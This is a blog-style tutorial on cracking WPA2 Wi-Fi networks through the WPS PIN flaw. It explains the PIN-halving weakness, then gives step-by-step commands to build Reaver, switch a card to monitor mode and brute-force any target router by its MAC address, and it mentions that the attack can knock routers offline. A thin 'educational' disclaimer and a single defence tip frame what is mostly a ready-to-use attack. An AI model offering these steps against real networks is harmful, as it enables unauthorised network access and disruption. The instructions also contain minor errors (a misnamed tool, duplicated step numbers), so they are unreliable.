Wifi Protected Setup or WPS is a 802.11 certified standard for delivering security over your Wireless network.
Wi-Fi Protected Setup enables typical users who possess little understanding of traditional Wi-Fi configuration and security settings to automatically configure new wireless networks, add new devices and enable security. WPS has been accompanying WPA2 since 2007, with over 200 wireless routers that support WPS with WPA2.
Warning: This guide is to showcase weaknesses in Wifi security standards & is purely for educational purposes only. If you’ve an intention other than ‘fun’ & ‘learning’, you can stop reading now. This Hack was originally showcased at Shmoocon 2012.
All vendors (including Cisco/Linksys, Netgear, D-Link, Belkin, Buffalo, ZyXEL, TP-Link and Technicolor) have WPS-enabled devices. WPS is activated by default on all devices I had access to.
Although WPS is marketed as being a secure way of configuring a wireless device, there are design and implementation flaws which enable an attacker to gain access to an otherwise sufficiently secured wireless network.
WPA2 has been around for more than 6 years and WPA2 hacking/cracking is often slow since it has to wait for a client to auth or deauth before cracking it. the newWPS technique is way more faster, and cracks can range from few hours to few days.
How the WPA2 WPS Crack works
Basically, a PC like windows 7 can act as a Registrar for your Wifi router, and assists in authenticating other devices to your WPS enabled Wirelesss network. An attacker can pretend to be that one registrar and derive information about the correctness of parts the PIN from the AP’s responses. Doing this involves cracking 8-digit key, which is divided into two 4-digit key pairs. To be honest its only 4+3 = 7 digits, last digit used only for checksum. So in all, when bruteforcing, attacker has really have to try just 10,000 + 1000 = 11,000 keys before he nails it down:
- If the attacker receives an EAP-NACK message after sending M4, he knows that the 1st half of the PIN was incorrect and can retry with next till it completes 10,000 attempts. Some routers can blacklist you for couple of minutes after 50 attempts, but good news is that most routers don’t. And when even they do, you can still get them cracked in a matter of few days.
- If the attacker receives an EAP-NACK message after sending M6, he knows that the 2nd half of the PIN was incorrect and retry with next brute-forced key, like in step 1.
WPA WPS crack demo at Shmoocon 2012
Video starts at 17:00
How to Crack WPA2 WPS 802.11 Wifi
Note: Method works only with WPA routers which have WPS support. Most routers sold since 2008 and later are WPS enabled.
Downloads & setup:
- I used Ubuntu 11.10, but you can use any linux distro. Root access is required and installation should be native, VMware & Virtualbox just won’t work.
- libpcap, traffic capture library, available via Ubuntu’s software center, or simply use the commands in step 1.
- Download Reaver, our tool to trigger WPS attack (its Open Source).
Step 1. How to Install Libpcap, other dependencies:
sudo apt-get update
sudo apt-get install build-essential
sudo apt-get install flex bison
sudo apt-get install libpcap-dev
sudo apt-get install libpcap3-dev
sudo apt-get install libsqlite3-dev
sudo apt-get install libnl2-dev
Step 2. How to Compile/Build Reaper:
Make sure you’ve build-essential, then run following commands (assuming reaver is extracted to desktop):
sudo make install
Step 3. Identify MAC address of the target router.
You can use any Wifi Scanner like iwScanner (download) to note the MAC address of the target Wifi SSID.
Step 4. Putting your Wireless card to monitor mode.
Run these commands on terminal:
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
Step 5. Starting the attack:
Reaver only requires two inputs to launch an attack: the interface to use to launch them, and the MAC address of the target:
sudo reaver -i wlan0 -b 00:01:02:03:04:05
There are couple of options that you can use, but I`ll like to keep it simple here. You can tweak timeout retries and other stuff like pause, resume of the crack.
Your crack is in progress, and would take few hours to be cracked.
Step 4. When the attack finishes, it will give you the SSID and authentication password for the target network.
Bingo, you’re done!
The tool also managed to repeatedly cause the router to stop responding to other computers on the network, essentially creating a denial of service DoS attack.
Security Tip: How to prevent WPA2 WPS from getting Hacked
Prevention is the only cure. The only way to avoid getting hacked is to disable WPS mode in your admin console.
Stay safe, stay secure.